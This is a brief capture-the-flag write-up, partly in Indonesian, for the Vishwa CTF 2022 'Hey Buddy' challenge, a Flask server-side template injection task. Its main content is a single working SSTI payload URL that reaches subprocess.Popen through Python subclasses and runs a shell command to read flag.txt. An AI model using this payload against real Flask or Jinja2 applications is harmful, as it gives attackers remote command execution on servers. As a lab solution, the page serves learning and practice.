Skip to content

Vishwa CTF 2022: Hey Buddy

link : https://h3y-buddy.vishwactf.com

kata kunci

python flask Server-Side Template Injection (SSTI)

Bacaan

Vulnerable

https://h3y-buddy.vishwactf.com/submit?name={{''.__class__.__mro__[1].__subclasses__()[213]('cat\tflag.txt',shell=True,stdout=-1).communicate()}}

*penjelasan ada pada referensi bacaan

Solusi lain